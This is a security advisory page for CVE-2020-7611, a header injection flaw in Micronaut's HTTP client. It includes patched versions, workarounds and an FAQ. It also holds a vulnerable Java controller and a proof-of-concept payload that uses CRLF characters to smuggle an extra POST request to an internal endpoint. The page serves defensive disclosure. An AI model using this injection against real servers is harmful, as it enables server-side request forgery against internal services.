CWE
444
Advisory Published
CVE Published
Updated

CVE-2020-7611

First published: Mon Mar 30 2020(Updated: )

### Vulnerability Micronaut's HTTP client is vulnerable to "HTTP Request Header Injection" due to not validating request headers passed to the client. Example of vulnerable code: ```java @Controller("/hello") public class HelloController { @Inject @Client("/") RxHttpClient client; @Get("/external-exploit") @Produces(MediaType.TEXT_PLAIN) public String externalExploit(@QueryValue("header-value") String headerValue) { return client.toBlocking().retrieve( HttpRequest.GET("/hello") .header("Test", headerValue) ); } } ``` In the above case a query value received from a user is passed as a header value to the client. Since the client doesn't validate the header value the request headers and body have the potential to be manipulated. For example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests. ```java List<String> headerData = List.of( "Connection: Keep-Alive", // This keeps the connection open so another request can be stuffed in. "", "", "POST /hello/super-secret HTTP/1.1", "Host: 127.0.0.1", "Content-Length: 31", "", "{\"new\":\"json\",\"content\":\"here\"}", "", "" ); String headerValue = "H\r\n" + String.join("\r\n", headerData);; URI theURI = UriBuilder .of("/hello/external-exploit") .queryParam("header-value", headerValue) // Automatically URL encodes data .build(); HttpRequest<String> request = HttpRequest.GET(theURI); String body = client.toBlocking().retrieve(request); ``` Note that using `@HeaderValue` instead of `@QueryValue` is not vulnerable since Micronaut's HTTP server does validate the headers passed to the server, so the exploit can only be triggered by using user data that is not an HTTP header (query values, form data etc.). ### Impact The attacker is able to control the entirety of the HTTP body for their custom requests. As such, this vulnerability enables attackers to perform a variant of [Server Side Request Forgery](https://cwe.mitre.org/data/definitions/918.html). ### Patches The problem has been patched in the `micronaut-http-client` versions 1.2.11 and 1.3.2 and above. ### Workarounds Do not pass user data directly received from HTTP request parameters as headers in the HTTP client. ### References Fix commits - https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1 - https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d - https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add ### For more information If you have any questions or comments about this advisory: * Open an issue in [micronaut-core](https://github.com/micronaut-projects/micronaut-core) * Email us at [info@micronaut.io](mailto:info@micronaut.io) ### Credit Originally reported by @JLLeitschuh

Credit: report@snyk.io report@snyk.io

Affected SoftwareAffected VersionHow to fix
Objectcomputing Micronaut<1.2.11
Objectcomputing Micronaut>=1.3.0<1.3.2
maven/io.micronaut:micronaut-http-client>=1.3.0<1.3.2
1.3.2
maven/io.micronaut:micronaut-http-client<1.2.11
1.2.11

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Frequently Asked Questions

  • What is CVE-2020-7611?

    CVE-2020-7611 is a vulnerability in io.micronaut:micronaut-http-client that allows for HTTP Request Header Injection due to not validating request headers.

  • How severe is CVE-2020-7611?

    CVE-2020-7611 has a severity rating of 9.8 (Critical).

  • What software versions are affected by CVE-2020-7611?

    All versions of io.micronaut:micronaut-http-client before 1.2.11 and all versions from 1.3.0 before 1.3.2 are affected by CVE-2020-7611.

  • How can I fix CVE-2020-7611?

    To fix CVE-2020-7611, upgrade to version 1.2.11 or higher if you are on a version before 1.2.11. If you are on a version between 1.3.0 and 1.3.2, upgrade to version 1.3.2 or higher.

  • Where can I find more information about CVE-2020-7611?

    You can find more information about CVE-2020-7611 at the following references: - [GitHub Commit](https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1) - [GitHub Security Advisory](https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-694p-xrhg-x3wm) - [Snyk Vulnerability Database](https://snyk.io/vuln/SNYK-JAVA-IOMICRONAUT-561342)

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2024 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203